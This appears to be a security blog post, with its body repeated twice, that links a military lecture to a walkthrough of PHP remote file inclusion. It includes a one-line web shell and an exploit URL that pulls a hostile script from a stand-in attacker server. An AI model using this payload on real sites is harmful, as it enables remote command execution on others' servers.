RSS Feed
TwitterThe New Face of War & Hacking PHP
A couple of weeks ago I attended a lecture at the Pritzker Military Library given by Bruce Berkowitz. You can actually watch the archived lecture here. The library is about as atypical for a library as it gets. It is essentially a personal collection of 12,000 military related books and other assorted artifacts donated really, really rich guy that spent some time in the Army. It's on the third floor of a commercial building in downtown Chicago, which also happens to house a Chipolte, a whole flock of lawyers (what do you call a bunch of lawyers? a gaggle?) and one of my favorite indian resturants.
Anyway, the subject of the lecture was on the new ways that wars are being fought now that communication systems have drastically changed. From the Peloponnesian War (great book if you are interested in military history) to the First Gulf War, communication in battle has stayed roughly the same. Military units are divided into smaller hierarchical groups, and commands are passed down from the top. Spear-throwing Spartans, English Longbowmen, and German 88MM Flak artillerymen all communicated by essentially shouting orders at each other, trying to find the enemy and direct fire at it as accurately as possible. What has changed, and hence the title of the lecture, the New Face of War, is that weapons are now so incredibly accurate that whomever has the best communication system in battle will likely win. Example: when a modern M1A1 Abrams tank fires at shot it has a 90% of taking out its target, compared to 10% for WWII era M4 Sherman Tank. Roughly the same percentages apply for WWII era bombs dropped from a B-17 and modern smart bombs, as well as modern infantry equipped night vision goggles vs. WWII infantry, etc.
So, if first shot equals a kill most of the time, whoever can find the enemy, point his super accurate weapon at him will win most of the time. It all comes down to the communication system.
Now, in Mr. Berkowitz's lecture, he was talking about military systems in the aggregate, whoever has the best satilites, comm gear, radio systems, radar, etc. will win the battle. But, you can easily apply this to the much narrower field (and one that is more relevant for blog readers) of information security. In today's IT landscape, whomever finds the vulnerable app first wins. If the bad guys realize before your security staff that some dopey developers have stored production data in unsecured test systems (ala CardSystems), you are going to get killed (and in CardSystems' case, literally!). The other point to be made here is who the enemy is. In most cases, the enemy is your own stuff. The split tunnel VPN you allow into your corporate network. The unpatched boxes on the SIPRNET. The web application that no one bothered to test for security bugs.
Speaking of vulnerable web applications, I have yet to find an application written in PHP that isn't vulnerable. I'm kind of biased, because I usually am asked to assess web apps because they are suspected of being vulnerable. One of the first things to check for when attacking a PHP app is PHP source code injection. The idea behind PHP source injection is to force the application to load a hostile PHP script from another server controlled by the attacker. With PHP, you can set the value stored in any global variable via a get request. If that variable happens to be used in a an include construction like so:
include ("$load.php")
You can manipulate the value stored in $load with a simple GET request from a broswer:
http://vulnerabledork.com/accnt.php?load=test
If the PHP interpreter attempts to load the value test, and you get an error like so:
Warning: main(): Failed opening 'test' for inclusion
You know the app is vulnerable, because the PHP interpreter is attempting to load a php file called "test" which does not exist, so you get the above error. Exploiting this is super easy. Just stick a PHP script on another server (the vulnerable server must allow outbound port 80 connections), simply stuff your hostile PHP script into the vulnerable app. Create a hostile PHP script (called hostile in this example) that loads the shell interpreter:
system($_GET["cmd'])
And now force the vulnerable program to load our hostile script:
http://vulnerabledork.com/accnt.php?load=http://www.attacker.com/hostile?&cmd=ls
If you get a directory listing of the web root, guess what? You have found the vulnerability, and my guess is that you would have BETTER than a 90% chance of killing your target.
Anyway, the subject of the lecture was on the new ways that wars are being fought now that communication systems have drastically changed. From the Peloponnesian War (great book if you are interested in military history) to the First Gulf War, communication in battle has stayed roughly the same. Military units are divided into smaller hierarchical groups, and commands are passed down from the top. Spear-throwing Spartans, English Longbowmen, and German 88MM Flak artillerymen all communicated by essentially shouting orders at each other, trying to find the enemy and direct fire at it as accurately as possible. What has changed, and hence the title of the lecture, the New Face of War, is that weapons are now so incredibly accurate that whomever has the best communication system in battle will likely win. Example: when a modern M1A1 Abrams tank fires at shot it has a 90% of taking out its target, compared to 10% for WWII era M4 Sherman Tank. Roughly the same percentages apply for WWII era bombs dropped from a B-17 and modern smart bombs, as well as modern infantry equipped night vision goggles vs. WWII infantry, etc.
So, if first shot equals a kill most of the time, whoever can find the enemy, point his super accurate weapon at him will win most of the time. It all comes down to the communication system.
Now, in Mr. Berkowitz's lecture, he was talking about military systems in the aggregate, whoever has the best satilites, comm gear, radio systems, radar, etc. will win the battle. But, you can easily apply this to the much narrower field (and one that is more relevant for blog readers) of information security. In today's IT landscape, whomever finds the vulnerable app first wins. If the bad guys realize before your security staff that some dopey developers have stored production data in unsecured test systems (ala CardSystems), you are going to get killed (and in CardSystems' case, literally!). The other point to be made here is who the enemy is. In most cases, the enemy is your own stuff. The split tunnel VPN you allow into your corporate network. The unpatched boxes on the SIPRNET. The web application that no one bothered to test for security bugs.
Speaking of vulnerable web applications, I have yet to find an application written in PHP that isn't vulnerable. I'm kind of biased, because I usually am asked to assess web apps because they are suspected of being vulnerable. One of the first things to check for when attacking a PHP app is PHP source code injection. The idea behind PHP source injection is to force the application to load a hostile PHP script from another server controlled by the attacker. With PHP, you can set the value stored in any global variable via a get request. If that variable happens to be used in a an include construction like so:
include ("$load.php")
You can manipulate the value stored in $load with a simple GET request from a broswer:
http://vulnerabledork.com/accnt.php?load=test
If the PHP interpreter attempts to load the value test, and you get an error like so:
Warning: main(): Failed opening 'test' for inclusion
You know the app is vulnerable, because the PHP interpreter is attempting to load a php file called "test" which does not exist, so you get the above error. Exploiting this is super easy. Just stick a PHP script on another server (the vulnerable server must allow outbound port 80 connections), simply stuff your hostile PHP script into the vulnerable app. Create a hostile PHP script (called hostile in this example) that loads the shell interpreter:
system($_GET["cmd'])
And now force the vulnerable program to load our hostile script:
http://vulnerabledork.com/accnt.php?load=http://www.attacker.com/hostile?&cmd=ls
If you get a directory listing of the web root, guess what? You have found the vulnerability, and my guess is that you would have BETTER than a 90% chance of killing your target.
0 Response to "The New Face of War & Hacking PHP"
Post a Comment